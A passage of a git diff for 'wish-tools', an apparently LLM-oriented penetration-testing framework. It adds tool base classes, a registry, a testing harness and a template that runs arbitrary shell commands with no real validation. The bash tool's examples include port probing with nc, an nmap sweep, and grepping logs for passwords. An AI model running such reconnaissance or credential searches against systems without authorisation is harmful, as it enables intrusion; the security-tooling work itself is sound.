+if __name__ == "__main__":
+    asyncio.run(main())
diff --git a/wish-tools/scripts/tool_template.py b/wish-tools/scripts/tool_template.py
new file mode 100644
index 0000000..baccb1f
--- /dev/null
+++ b/wish-tools/scripts/tool_template.py
@@ -0,0 +1,136 @@
+"""
+TOOL_NAME tool implementation for wish framework.
+
+TODO: Replace TOOL_NAME with your actual tool name and implement the required methods.
+"""
+
+import asyncio
+import subprocess
+import time
+from typing import Any, Dict, Optional
+
+from wish_tools.framework.base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult
+
+
+class TOOL_NAMETool(BaseTool):
+    """TODO: Add tool description."""
+
+    def _build_metadata(self) -> ToolMetadata:
+        return ToolMetadata(
+            name="TOOL_NAME",
+            version="1.0.0",
+            description="TODO: Add tool description",
+            author="Your Name",
+            category="TODO: Choose category (network/exploitation/web/file/etc)",
+            capabilities=[
+                ToolCapability(
+                    name="TODO_capability_name",
+                    description="TODO: Describe what this capability does",
+                    parameters={
+                        "TODO_param": "TODO: Parameter description",
+                        "timeout": "Timeout in seconds (optional)",
+                    },
+                    examples=["TODO: Add example commands"],
+                )
+            ],
+            requirements=["TOOL_NAME"],  # System requirements
+            tags=["TODO", "add", "relevant", "tags"],
+        )
+
+    async def validate_availability(self) -> tuple[bool, Optional[str]]:
+        """Check if TOOL_NAME is available on the system."""
+        try:
+            result = subprocess.run(
+                ["TOOL_NAME", "--version"],  # Adjust command as needed
+                capture_output=True,
+                text=True,
+                timeout=5,
+            )
+            if result.returncode == 0:
+                return True, None
+            else:
+                return False, "TOOL_NAME returned non-zero exit code"
+        except FileNotFoundError:
+            return False, "TOOL_NAME not found. Please install TOOL_NAME"
+        except subprocess.TimeoutExpired:
+            return False, "TOOL_NAME version check timed out"
+        except Exception as e:
+            return False, f"Error checking TOOL_NAME availability: {str(e)}"
+
+    async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult:
+        """Execute TOOL_NAME command."""
+        start_time = time.time()
+
+        try:
+            # TODO: Implement tool execution
+            # Example implementation:
+
+            process = await asyncio.create_subprocess_shell(
+                command.command,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+                cwd=context.working_directory,
+            )
+
+            timeout = command.timeout_sec or context.timeout_override or 300
+
+            try:
+                stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=timeout)
+            except asyncio.TimeoutError:
+                process.kill()
+                await process.wait()
+                return ToolResult(
+                    success=False,
+                    output="",
+                    error="Command timed out",
+                    exit_code=124,
+                    execution_time=timeout,
+                    metadata={"timeout": True},
+                )
+
+            output = stdout.decode("utf-8", errors="replace") if stdout else ""
+            error = stderr.decode("utf-8", errors="replace") if stderr else ""
+
+            return ToolResult(
+                success=process.returncode == 0,
+                output=output,
+                error=error if error else None,
+                exit_code=process.returncode or 0,
+                execution_time=time.time() - start_time,
+                metadata={"command": command.command, "working_directory": context.working_directory},
+            )
+
+        except Exception as e:
+            return ToolResult(
+                success=False,
+                output="",
+                error=f"TOOL_NAME execution error: {str(e)}",
+                exit_code=-1,
+                execution_time=time.time() - start_time,
+                metadata={"error_type": type(e).__name__},
+            )
+
+    def generate_command(
+        self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None
+    ) -> CommandInput:
+        """Generate TOOL_NAME command for the specified capability."""
+
+        if capability == "TODO_capability_name":
+            # TODO: Implement command generation
+            command = f"TOOL_NAME {parameters.get('TODO_param', '')}"
+
+            return CommandInput(command=command, timeout_sec=parameters.get("timeout", 300))
+        else:
+            raise ValueError(f"Unknown capability: {capability}")
+
+    def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
+        """Validate TOOL_NAME command for safety."""
+        # TODO: Add tool-specific validation
+        cmd = command.command.strip()
+
+        if not cmd:
+            return False, "Command cannot be empty"
+
+        # Add any dangerous pattern checks here
+
+        return True, None
diff --git a/wish-tools/scripts/update_graph_visualization.py b/wish-tools/scripts/update_graph_visualization.py
index e01fb0b..67f833d 100644
--- a/wish-tools/scripts/update_graph_visualization.py
+++ b/wish-tools/scripts/update_graph_visualization.py
@@ -132,7 +132,7 @@ def extract_graph_config(graph: StateGraph) -> Dict:
         "entry_point": entry_point,
         "finish_points": finish_points,
         "edges": edges,
-        "conditional_edges": conditional_edges
+        "conditional_edges": conditional_edges,
     }
 
 
@@ -143,7 +143,7 @@ def generate_graph_visualization():
         "tool_step_trace": {
             "module_path": "wish_tools.tool_step_trace",
             "filename": "tool_step_trace_graph.svg",
-            "title": "Tool Step Trace Graph"
+            "title": "Tool Step Trace Graph",
         }
     }
 
@@ -238,6 +238,7 @@ def update_readme(graph_title: str, svg_filename: str):
         else:
             # Add this graph to the existing section
             import re
+
             section_pattern = re.compile(f"{graph_section_title}.*?(?=^#|$)", re.DOTALL | re.MULTILINE)
             section_match = section_pattern.search(content)
 
diff --git a/wish-tools/src/wish_tools/__init__.py b/wish-tools/src/wish_tools/__init__.py
new file mode 100644
index 0000000..08afb25
--- /dev/null
+++ b/wish-tools/src/wish_tools/__init__.py
@@ -0,0 +1,41 @@
+"""
+Wish Tools - Extensible tool framework for penetration testing workflows.
+
+This package provides a unified interface for various penetration testing tools,
+allowing them to be used seamlessly within the wish framework.
+
+## Quick Start
+
+```python
+from wish_tools.framework.registry import tool_registry
+from wish_tools.framework.base import ToolContext
+
+# Get available tools
+tools = tool_registry.list_tools()
+
+# Use a tool
+tool = tool_registry.get_tool("bash")
+context = ToolContext(working_directory="/tmp", run_id="test")
+result = await tool.execute(command, context)
+```
+
+## Legacy Tools
+
+The following legacy tools are available for backward compatibility:
+- tool_step_trace: Step tracing functionality
+- to_base64: Base64 encoding utility
+
+These will be migrated to the new framework interface in future versions.
+"""
+
+from wish_tools.framework.registry import tool_registry
+
+__version__ = "1.0.0"
+__all__ = ["tool_registry"]
+
+# Auto-discover and register tools
+try:
+    tool_registry.auto_discover_tools("wish_tools.tools")
+except Exception:
+    # Graceful degradation if auto-discovery fails
+    pass
diff --git a/wish-tools/src/wish_tools/framework/__init__.py b/wish-tools/src/wish_tools/framework/__init__.py
new file mode 100644
index 0000000..b6ccf58
--- /dev/null
+++ b/wish-tools/src/wish_tools/framework/__init__.py
@@ -0,0 +1,24 @@
+"""
+Wish Tools Framework - Core framework components for tool abstraction.
+
+This module provides the base classes and utilities for implementing
+tools in the wish framework.
+"""
+
+from .base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult
+from .registry import ToolRegistry, tool_registry
+from .testing import TestCase, TestResult, ToolTester
+
+__all__ = [
+    "BaseTool",
+    "CommandInput",
+    "ToolMetadata",
+    "ToolCapability",
+    "ToolContext",
+    "ToolResult",
+    "ToolRegistry",
+    "tool_registry",
+    "ToolTester",
+    "TestCase",
+    "TestResult",
+]
diff --git a/wish-tools/src/wish_tools/framework/base.py b/wish-tools/src/wish_tools/framework/base.py
new file mode 100644
index 0000000..be23a34
--- /dev/null
+++ b/wish-tools/src/wish_tools/framework/base.py
@@ -0,0 +1,187 @@
+"""
+Base classes for the wish tools framework.
+
+This module provides the abstract base classes and data models
+that all tools must implement.
+"""
+
+from abc import ABC, abstractmethod
+from typing import Any, Dict, List, Optional
+
+from pydantic import BaseModel, Field
+
+
+class ToolCapability(BaseModel):
+    """Describes a specific capability of a tool."""
+
+    name: str = Field(description="Name of the capability")
+    description: str = Field(description="Description of what this capability does")
+    parameters: Dict[str, Any] = Field(default_factory=dict, description="Parameters for this capability")
+    examples: List[str] = Field(default_factory=list, description="Example commands")
+
+
+class ToolMetadata(BaseModel):
+    """Metadata for a tool."""
+
+    name: str = Field(description="Tool name")
+    version: str = Field(description="Tool version")
+    description: str = Field(description="Tool description")
+    author: str = Field(description="Tool author")
+    category: str = Field(description="Tool category (e.g., 'network', 'exploitation', 'general')")
+    capabilities: List[ToolCapability] = Field(default_factory=list)
+    requirements: List[str] = Field(default_factory=list, description="System requirements")
+    tags: List[str] = Field(default_factory=list, description="Tags for tool discovery")
+
+
+class ToolContext(BaseModel):
+    """Context passed to tools during execution."""
+
+    working_directory: str
+    environment_variables: Dict[str, str] = Field(default_factory=dict)
+    system_info: Optional[Dict[str, Any]] = None
+    run_id: Optional[str] = None
+    timeout_override: Optional[int] = None
+
+
+class CommandInput(BaseModel):
+    """Input command for tool execution."""
+
+    command: str = Field(description="The command to execute")
+    timeout_sec: int = Field(default=300, description="Timeout in seconds")
+
+
+class ToolResult(BaseModel):
+    """Result from tool execution."""
+
+    success: bool = Field(description="Whether execution was successful")
+    output: str = Field(description="Standard output from the command")
+    error: Optional[str] = Field(default=None, description="Error output if any")
+    exit_code: int = Field(description="Exit code from the command")
+    execution_time: float = Field(description="Execution time in seconds")
+    metadata: Dict[str, Any] = Field(default_factory=dict, description="Additional metadata")
+
+
+class BaseTool(ABC):
+    """Abstract base class for all tools in the framework."""
+
+    def __init__(self, config: Optional[Dict[str, Any]] = None):
+        """Initialize the tool with optional configuration."""
+        self.config = config or {}
+        self._metadata = self._build_metadata()
+
+    @abstractmethod
+    def _build_metadata(self) -> ToolMetadata:
+        """Build and return tool metadata."""
+        pass
+
+    @property
+    def metadata(self) -> ToolMetadata:
+        """Get tool metadata."""
+        return self._metadata
+
+    @abstractmethod
+    async def validate_availability(self) -> tuple[bool, Optional[str]]:
+        """Check if the tool is available on the system.
+
+        Returns:
+            Tuple of (is_available, error_message)
+        """
+        pass
+
+    @abstractmethod
+    async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult:
+        """Execute a command using this tool.
+
+        Args:
+            command: The command to execute
+            context: Execution context
+            **kwargs: Additional tool-specific arguments
+
+        Returns:
+            ToolResult containing execution results
+        """
+        pass
+
+    @abstractmethod
+    def generate_command(
+        self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None
+    ) -> CommandInput:
+        """Generate a command for a specific capability.
+
+        Args:
+            capability: The capability to use
+            parameters: Parameters for the capability
+            context: Optional execution context
+
+        Returns:
+            Generated CommandInput
+        """
+        pass
+
+    def get_documentation(self) -> str:
+        """Generate comprehensive documentation for this tool."""
+        doc_parts = [
+            f"# {self.metadata.name}",
+            f"\n{self.metadata.description}",
+            f"\n**Version:** {self.metadata.version}",
+            f"**Author:** {self.metadata.author}",
+            f"**Category:** {self.metadata.category}",
+            f"**Tags:** {', '.join(self.metadata.tags)}",
+            "\n## Requirements",
+            "\n".join(f"- {req}" for req in self.metadata.requirements),
+            "\n## Capabilities",
+        ]
+
+        for cap in self.metadata.capabilities:
+            doc_parts.extend([f"\n### {cap.name}", f"{cap.description}", "\n**Parameters:**"])
+            for param, details in cap.parameters.items():
+                doc_parts.append(f"- `{param}`: {details}")
+
+            if cap.examples:
+                doc_parts.append("\n**Examples:**")
+                for example in cap.examples:
+                    doc_parts.append(f"```bash\n{example}\n```")
+
+        return "\n".join(doc_parts)
+
+    def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
+        """Validate if a command can be executed by this tool.
+
+        Args:
+            command: The command to validate
+
+        Returns:
+            Tuple of (is_valid, error_message)
+        """
+        # Default implementation - can be overridden by specific tools
+        return True, None
+
+
+class ToolException(Exception):
+    """Base exception for tool-related errors."""
+
+    pass
+
+
+class ToolNotFoundError(ToolException):
+    """Raised when a requested tool is not found."""
+
+    pass
+
+
+class ToolRegistrationError(ToolException):
+    """Raised when tool registration fails."""
+
+    pass
+
+
+class DuplicateToolError(ToolException):
+    """Raised when attempting to register a duplicate tool."""
+
+    pass
+
+
+class ToolExecutionError(ToolException):
+    """Raised when tool execution fails."""
+
+    pass
diff --git a/wish-tools/src/wish_tools/framework/registry.py b/wish-tools/src/wish_tools/framework/registry.py
new file mode 100644
index 0000000..3bc5bbd
--- /dev/null
+++ b/wish-tools/src/wish_tools/framework/registry.py
@@ -0,0 +1,197 @@
+"""
+Tool registry for managing available tools.
+
+This module provides the ToolRegistry class for registering, discovering,
+and managing tools in the wish framework.
+"""
+
+import importlib
+import pkgutil
+from typing import Dict, List, Optional, Set, Type
+
+from .base import BaseTool, DuplicateToolError, ToolMetadata, ToolNotFoundError, ToolRegistrationError
+
+
+class ToolRegistry:
+    """Registry for managing tools in the framework."""
+
+    def __init__(self):
+        self._tools: Dict[str, Type[BaseTool]] = {}
+        self._instances: Dict[str, BaseTool] = {}
+        self._categories: Dict[str, Set[str]] = {}
+        self._tags: Dict[str, Set[str]] = {}
+
+    def register_tool(self, tool_class: Type[BaseTool], override: bool = False) -> None:
+        """Register a tool class.
+
+        Args:
+            tool_class: The tool class to register
+            override: Whether to override existing tool with same name
+
+        Raises:
+            DuplicateToolError: If tool already exists and override is False
+            ToolRegistrationError: If tool class is invalid
+        """
+        # Create temporary instance to get metadata
+        try:
+            temp_instance = tool_class()
+            metadata = temp_instance.metadata
+        except Exception as e:
+            raise ToolRegistrationError(f"Failed to instantiate tool: {e}") from e
+
+        tool_name = metadata.name
+
+        if tool_name in self._tools and not override:
+            raise DuplicateToolError(f"Tool '{tool_name}' already registered")
+
+        self._tools[tool_name] = tool_class
+
+        # Update category index
+        if metadata.category not in self._categories:
+            self._categories[metadata.category] = set()
+        self._categories[metadata.category].add(tool_name)
+
+        # Update tag index
+        for tag in metadata.tags:
+            if tag not in self._tags:
+                self._tags[tag] = set()
+            self._tags[tag].add(tool_name)
+
+    def get_tool(self, name: str, config: Optional[Dict] = None) -> BaseTool:
+        """Get a tool instance by name.
+
+        Args:
+            name: Tool name
+            config: Optional configuration for the tool
+
+        Returns:
+            Tool instance
+
+        Raises:
+            ToolNotFoundError: If tool not found
+        """
+        if name not in self._tools:
+            raise ToolNotFoundError(f"Tool '{name}' not found")
+
+        # Create instance if not cached or config provided
+        cache_key = f"{name}_{hash(str(config))}" if config else name
+        if cache_key not in self._instances:
+            self._instances[cache_key] = self._tools[name](config)
+
+        return self._instances[cache_key]
+
+    def list_tools(self) -> List[ToolMetadata]:
+        """List all registered tools."""
+        tools = []
+        for tool_class in self._tools.values():
+            instance = tool_class()
+            tools.append(instance.metadata)
+        return tools
+
+    def list_by_category(self, category: str) -> List[str]:
+        """List tools by category."""
+        return list(self._categories.get(category, []))
+
+    def list_by_tag(self, tag: str) -> List[str]:
+        """List tools by tag."""
+        return list(self._tags.get(tag, []))
+
+    def search_tools(self, query: str) -> List[ToolMetadata]:
+        """Search tools by name, description, or tags."""
+        query_lower = query.lower()
+        results = []
+
+        for tool_class in self._tools.values():
+            instance = tool_class()
+            metadata = instance.metadata
+
+            # Search in name, description, and tags
+            if (
+                query_lower in metadata.name.lower()
+                or query_lower in metadata.description.lower()
+                or any(query_lower in tag.lower() for tag in metadata.tags)
+            ):
+                results.append(metadata)
+
+        return results
+
+    def auto_discover_tools(self, package_path: str = "wish_tools.tools") -> None:
+        """Auto-discover and register tools from a package.
+
+        Args:
+            package_path: Python package path to search for tools
+        """
+        # Import the package
+        try:
+            package = importlib.import_module(package_path)
+        except ImportError as e:
+            raise ToolRegistrationError(f"Failed to import package '{package_path}': {e}") from e
+
+        # Walk through all modules in the package
+        for _, module_name, _ in pkgutil.walk_packages(package.__path__, prefix=package.__name__ + "."):
+            try:
+                module = importlib.import_module(module_name)
+
+                # Look for BaseTool subclasses
+                for attr_name in dir(module):
+                    attr = getattr(module, attr_name)
+                    if isinstance(attr, type) and issubclass(attr, BaseTool) and attr is not BaseTool:
+                        try:
+                            self.register_tool(attr)
+                        except DuplicateToolError:
+                            # Skip duplicates during auto-discovery
+                            pass
+            except Exception:
+                # Skip modules that fail to import
+                continue
+
+    def get_tool_names(self) -> List[str]:
+        """Get list of all registered tool names."""
+        return list(self._tools.keys())
+
+    def has_tool(self, name: str) -> bool:
+        """Check if a tool is registered."""
+        return name in self._tools
+
+    def unregister_tool(self, name: str) -> bool:
+        """Unregister a tool.
+
+        Args:
+            name: Tool name to unregister
+
+        Returns:
+            True if tool was unregistered, False if not found
+        """
+        if name not in self._tools:
+            return False
+
+        # Get metadata for cleanup
+        instance = self._tools[name]()
+        metadata = instance.metadata
+
+        # Remove from main registry
+        del self._tools[name]
+
+        # Remove from instances cache
+        keys_to_remove = [k for k in self._instances.keys() if k.startswith(name)]
+        for key in keys_to_remove:
+            del self._instances[key]
+
+        # Remove from category index
+        if metadata.category in self._categories:
+            self._categories[metadata.category].discard(name)
+            if not self._categories[metadata.category]:
+                del self._categories[metadata.category]
+
+        # Remove from tag index
+        for tag in metadata.tags:
+            if tag in self._tags:
+                self._tags[tag].discard(name)
+                if not self._tags[tag]:
+                    del self._tags[tag]
+
+        return True
+
+
+# Global registry instance
+tool_registry = ToolRegistry()
diff --git a/wish-tools/src/wish_tools/framework/testing.py b/wish-tools/src/wish_tools/framework/testing.py
new file mode 100644
index 0000000..870ba62
--- /dev/null
+++ b/wish-tools/src/wish_tools/framework/testing.py
@@ -0,0 +1,276 @@
+"""
+Testing framework for wish tools.
+
+This module provides utilities for testing tool implementations,
+including test case definitions, validators, and reporting.
+"""
+
+import asyncio
+import tempfile
+import time
+from dataclasses import dataclass
+from typing import Any, Callable, Dict, List, Optional
+
+from .base import BaseTool, ToolContext, ToolResult
+
+
+@dataclass
+class TestCase:
+    """Test case for a tool."""
+
+    name: str
+    description: str
+    capability: str
+    parameters: Dict[str, Any]
+    expected_success: bool
+    validators: List[Callable[[ToolResult], tuple[bool, str]]]
+    timeout: int = 300
+    skip_if: Optional[Callable[[], bool]] = None
+
+
+@dataclass
+class TestResult:
+    """Result of a test case."""
+
+    test_case: TestCase
+    passed: bool
+    execution_time: float
+    tool_result: Optional[ToolResult]
+    error: Optional[str]
+    validation_errors: List[str]
+
+
+class OutputValidator:
+    """Validator for tool output."""
+
+    def __init__(self, contains: Optional[str] = None, not_contains: Optional[str] = None):
+        self.contains = contains
+        self.not_contains = not_contains
+
+    def __call__(self, result: ToolResult) -> tuple[bool, str]:
+        if self.contains and self.contains not in result.output:
+            return False, f"Output should contain '{self.contains}'"
+
+        if self.not_contains and self.not_contains in result.output:
+            return False, f"Output should not contain '{self.not_contains}'"
+
+        return True, ""
+
+
+class ExitCodeValidator:
+    """Validator for exit codes."""
+
+    def __init__(self, expected: int):
+        self.expected = expected
+
+    def __call__(self, result: ToolResult) -> tuple[bool, str]:
+        if result.exit_code != self.expected:
+            return False, f"Expected exit code {self.expected}, got {result.exit_code}"
+        return True, ""
+
+
+class MetadataValidator:
+    """Validator for metadata content."""
+
+    def __init__(self, required_keys: List[str]):
+        self.required_keys = required_keys
+
+    def __call__(self, result: ToolResult) -> tuple[bool, str]:
+        for key in self.required_keys:
+            if key not in result.metadata:
+                return False, f"Metadata missing required key: {key}"
+        return True, ""
+
+
+class PerformanceValidator:
+    """Validator for performance requirements."""
+
+    def __init__(self, max_time: float):
+        self.max_time = max_time
+
+    def __call__(self, result: ToolResult) -> tuple[bool, str]:
+        if result.execution_time > self.max_time:
+            return False, f"Execution took {result.execution_time:.2f}s, max allowed {self.max_time}s"
+        return True, ""
+
+
+class ToolTester:
+    """Framework for testing tools."""
+
+    def __init__(self, tool: BaseTool, context: Optional[ToolContext] = None):
+        self.tool = tool
+        self.context = context or self._default_context()
+
+    def _default_context(self) -> ToolContext:
+        """Create default test context."""
+        temp_dir = tempfile.mkdtemp()
+        return ToolContext(working_directory=temp_dir, environment_variables={}, run_id="test-run")
+
+    async def test_availability(self) -> TestResult:
+        """Test if tool is available."""
+        test_case = TestCase(
+            name="availability_check",
+            description="Check if tool is available on the system",
+            capability="",
+            parameters={},
+            expected_success=True,
+            validators=[],
+        )
+
+        start_time = time.time()
+        try:
+            is_available, error = await self.tool.validate_availability()
+
+            return TestResult(
+                test_case=test_case,
+                passed=is_available,
+                execution_time=time.time() - start_time,
+                tool_result=None,
+                error=error,
+                validation_errors=[],
+            )
+        except Exception as e:
+            return TestResult(
+                test_case=test_case,
+                passed=False,
+                execution_time=time.time() - start_time,
+                tool_result=None,
+                error=str(e),
+                validation_errors=[],
+            )
+
+    async def run_test_case(self, test_case: TestCase) -> TestResult:
+        """Run a single test case."""
+        # Check skip condition
+        if test_case.skip_if and test_case.skip_if():
+            return TestResult(
+                test_case=test_case,
+                passed=True,
+                execution_time=0,
+                tool_result=None,
+                error="Test skipped",
+                validation_errors=[],
+            )
+
+        start_time = time.time()
+        validation_errors = []
+
+        try:
+            # Generate command
+            command = self.tool.generate_command(
+                capability=test_case.capability, parameters=test_case.parameters, context=self.context
+            )
+
+            # Execute command
+            tool_result = await asyncio.wait_for(self.tool.execute(command, self.context), timeout=test_case.timeout)
+
+            # Check basic success/failure
+            if tool_result.success != test_case.expected_success:
+                validation_errors.append(
+                    f"Expected success={test_case.expected_success}, got success={tool_result.success}"
+                )
+
+            # Run validators
+            for validator in test_case.validators:
+                is_valid, error = validator(tool_result)
+                if not is_valid:
+                    validation_errors.append(error)
+
+            passed = len(validation_errors) == 0
+
+            return TestResult(
+                test_case=test_case,
+                passed=passed,
+                execution_time=time.time() - start_time,
+                tool_result=tool_result,
+                error=None,
+                validation_errors=validation_errors,
+            )
+
+        except asyncio.TimeoutError:
+            return TestResult(
+                test_case=test_case,
+                passed=False,
+                execution_time=test_case.timeout,
+                tool_result=None,
+                error="Test timed out",
+                validation_errors=validation_errors,
+            )
+        except Exception as e:
+            return TestResult(
+                test_case=test_case,
+                passed=False,
+                execution_time=time.time() - start_time,
+                tool_result=None,
+                error=str(e),
+                validation_errors=validation_errors,
+            )
+
+    async def run_test_suite(self, test_cases: List[TestCase]) -> List[TestResult]:
+        """Run a suite of test cases."""
+        results = []
+
+        # First check availability
+        availability_result = await self.test_availability()
+        results.append(availability_result)
+
+        if not availability_result.passed:
+            # Skip other tests if tool not available
+            return results
+
+        # Run test cases
+        for test_case in test_cases:
+            result = await self.run_test_case(test_case)
+            results.append(result)
+
+        return results
+
+    def generate_report(self, results: List[TestResult]) -> str:
+        """Generate test report."""
+        report_lines = [
+            f"# Test Report for {self.tool.metadata.name}",
+            f"\nTool Version: {self.tool.metadata.version}",
+            f"Total Tests: {len(results)}",
+            f"Passed: {sum(1 for r in results if r.passed)}",
+            f"Failed: {sum(1 for r in results if not r.passed)}",
+            "\n## Test Results\n",
+        ]
+
+        for result in results:
+            status = "✅ PASSED" if result.passed else "❌ FAILED"
+            report_lines.append(f"### {result.test_case.name} - {status}")
+            report_lines.append(f"**Description:** {result.test_case.description}")
+            report_lines.append(f"**Execution Time:** {result.execution_time:.2f}s")
+
+            if result.error:
+                report_lines.append(f"**Error:** {result.error}")
+
+            if result.validation_errors:
+                report_lines.append("**Validation Errors:**")
+                for error in result.validation_errors:
+                    report_lines.append(f"- {error}")
+
+            if result.tool_result:
+                report_lines.append("\n**Tool Output Preview:**")
+                output_preview = result.tool_result.output[:500]
+                if len(result.tool_result.output) > 500:
+                    output_preview += "... (truncated)"
+                report_lines.append(f"```\n{output_preview}\n```")
+
+            report_lines.append("")
+
+        return "\n".join(report_lines)
+
+
+def create_basic_test_suite(tool_name: str) -> List[TestCase]:
+    """Create a basic test suite for any tool."""
+    return [
+        TestCase(
+            name="metadata_check",
+            description="Verify tool metadata is properly configured",
+            capability="",
+            parameters={},
+            expected_success=True,
+            validators=[],
+        )
+    ]
diff --git a/wish-tools/src/wish_tools/tool_step_trace.py b/wish-tools/src/wish_tools/tool_step_trace.py
index bf4660f..e98aa01 100644
--- a/wish-tools/src/wish_tools/tool_step_trace.py
+++ b/wish-tools/src/wish_tools/tool_step_trace.py
@@ -25,6 +25,7 @@ class StepTraceState(BaseModel):
         response_status_code: レスポンスのステータスコード
         response_body: レスポンスのボディ
     """
+
     run_id: str
     trace_name: str
     trace_message: str
@@ -51,7 +52,7 @@ def encode_trace_message(state: StepTraceState) -> StepTraceState:
         run_id=state.run_id,
         trace_name=state.trace_name,
         trace_message=state.trace_message,
-        trace_message_base64=encoded
+        trace_message_base64=encoded,
     )
 
 
@@ -69,7 +70,7 @@ def post_step_trace(state: StepTraceState) -> StepTraceState:
     data = {
         "run_id": state.run_id,  # プレフィックスを追加しない
         "trace_name": state.trace_name,
-        "trace_message_base64": state.trace_message_base64
+        "trace_message_base64": state.trace_message_base64,
     }
 
     try:
@@ -77,7 +78,7 @@ def post_step_trace(state: StepTraceState) -> StepTraceState:
         response = requests.post(
             "http://host.docker.internal:23456/api/addStepTrace",
             json=data,
-            headers={"Content-Type": "application/json"}
+            headers={"Content-Type": "application/json"},
         )
 
         # レスポンスを取得
@@ -95,7 +96,7 @@ def post_step_trace(state: StepTraceState) -> StepTraceState:
         trace_message=state.trace_message,
         trace_message_base64=state.trace_message_base64,
         response_status_code=status_code,
-        response_body=body
+        response_body=body,
     )
 
 
@@ -121,11 +122,7 @@ def build_graph() -> StateGraph:
     return graph
 
 
-def main(
-    run_id: str,
-    trace_name: str,
-    trace_message: str
-) -> Dict[str, str]:
+def main(run_id: str, trace_name: str, trace_message: str) -> Dict[str, str]:
     """
     メイン関数
 
@@ -142,23 +139,13 @@ def main(
         graph = build_graph()
 
         # グラフの実行
-        initial_state = StepTraceState(
-            run_id=run_id,
-            trace_name=trace_name,
-            trace_message=trace_message
-        )
+        initial_state = StepTraceState(run_id=run_id, trace_name=trace_name, trace_message=trace_message)
 
         workflow = graph.compile()
         result = workflow.invoke(initial_state, {"run_name": f"Tool-StepTrace-{trace_name}"})
 
         # 結果を返す
-        return {
-            "status_code": result["response_status_code"],
-            "body": result["response_body"]
-        }
+        return {"status_code": result["response_status_code"], "body": result["response_body"]}
     except Exception as e:
         # エラーが発生した場合
-        return {
-            "status_code": 599,
-            "body": f"Error during workflow execution: {str(e)}"
-        }
+        return {"status_code": 599, "body": f"Error during workflow execution: {str(e)}"}
diff --git a/wish-tools/src/wish_tools/tools/__init__.py b/wish-tools/src/wish_tools/tools/__init__.py
new file mode 100644
index 0000000..fa92e9a
--- /dev/null
+++ b/wish-tools/src/wish_tools/tools/__init__.py
@@ -0,0 +1,60 @@
+"""
+Wish Tools - Tool implementations.
+
+This package contains the actual tool implementations that conform
+to the wish tools framework interface.
+
+Available tools:
+- BashTool: Execute bash commands
+- MsfconsoleTool: Metasploit Framework console
+- NmapTool: Network exploration and security auditing
+
+## Adding New Tools
+
+To add a new tool:
+
+1. Create a new Python file in this directory
+2. Implement a class that inherits from BaseTool
+3. The tool will be auto-discovered by the framework
+
+Example:
+
+```python
+from wish_tools.framework.base import BaseTool, ToolMetadata, ToolCapability
+
+class MyTool(BaseTool):
+    def _build_metadata(self) -> ToolMetadata:
+        return ToolMetadata(
+            name="mytool",
+            version="1.0.0",
+            description="My custom tool",
+            author="Me",
+            category="custom",
+            capabilities=[...],
+            requirements=["mytool-binary"],
+            tags=["custom"]
+        )
+
+    async def validate_availability(self):
+        # Check if tool is available
+        pass
+
+    async def execute(self, command, context):
+        # Execute the tool
+        pass
+
+    def generate_command(self, capability, parameters, context=None):
+        # Generate command for LLM
+        pass
+```
+"""
+
+# Import all tools to make them available for auto-discovery
+try:
+    from .bash import BashTool
+    from .msfconsole import MsfconsoleTool
+
+    __all__ = ["BashTool", "MsfconsoleTool"]
+except ImportError:
+    # Graceful degradation if some tools can't be imported
+    __all__ = []
diff --git a/wish-tools/src/wish_tools/tools/bash.py b/wish-tools/src/wish_tools/tools/bash.py
index afd546e..286c7ff 100644
--- a/wish-tools/src/wish_tools/tools/bash.py
+++ b/wish-tools/src/wish_tools/tools/bash.py
@@ -9,16 +9,14 @@
 import subprocess
 import time
 from pathlib import Path
-from typing import Dict, Any, Optional
+from typing import Any, Dict, Optional
 
-from wish_tools.framework.base import (
-    BaseTool, ToolMetadata, ToolCapability, ToolContext, ToolResult, CommandInput
-)
+from wish_tools.framework.base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult
 
 
 class BashTool(BaseTool):
     """Bash shell command execution tool."""
-    
+
     def _build_metadata(self) -> ToolMetadata:
         return ToolMetadata(
             name="bash",
@@ -33,13 +31,13 @@ def _build_metadata(self) -> ToolMetadata:
                     parameters={
                         "command": "The bash command to execute",
                         "timeout": "Timeout in seconds (optional, default: 300)",
-                        "category": "Command category hint (optional: network, file, process, system, web, text)"
+                        "category": "Command category hint (optional: network, file, process, system, web, text)",
                     },
                     examples=[
                         "# Network enumeration fallback",
                         "nc -zv 192.168.1.1 22-443",
                         "ping -c 4 8.8.8.8",
-                        "# File operations fallback", 
+                        "# File operations fallback",
                         "find /etc -name '*.conf' -type f",
                         "grep -r 'password' /var/log/",
                         "# Process management fallback",
@@ -47,49 +45,43 @@ def _build_metadata(self) -> ToolMetadata:
                         "netstat -tulpn | grep :80",
                         "# System information fallback",
                         "uname -a && cat /etc/os-release",
-                        "df -h && free -h"
-                    ]
+                        "df -h && free -h",
+                    ],
                 ),
                 ToolCapability(
                     name="script",
                     description="Execute custom bash scripts for complex operations",
-                    parameters={
-                        "script": "The bash script content",
-                        "args": "Script arguments (optional)"
-                    },
+                    parameters={"script": "The bash script content", "args": "Script arguments (optional)"},
                     examples=[
                         "#!/bin/bash\n# Custom enumeration script\nfor port in 22 80 443; do nc -zv $1 $port; done",
-                        "#!/bin/bash\n# Log analysis script\ngrep 'ERROR' /var/log/*.log | tail -20"
-                    ]
+                        "#!/bin/bash\n# Log analysis script\ngrep 'ERROR' /var/log/*.log | tail -20",
+                    ],
                 ),
                 ToolCapability(
                     name="tool_combination",
                     description="Combine multiple tools with pipes and logic when no single specialized tool exists",
                     parameters={
                         "command": "Complex command combining multiple tools",
-                        "description": "Description of what the combined command does"
+                        "description": "Description of what the combined command does",
                     },
                     examples=[
                         "# Network discovery + service detection",
-                        "nmap -sn 192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | xargs -I {} nmap -sV -p 22,80,443 {}",
+                        "nmap -sn 192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | "
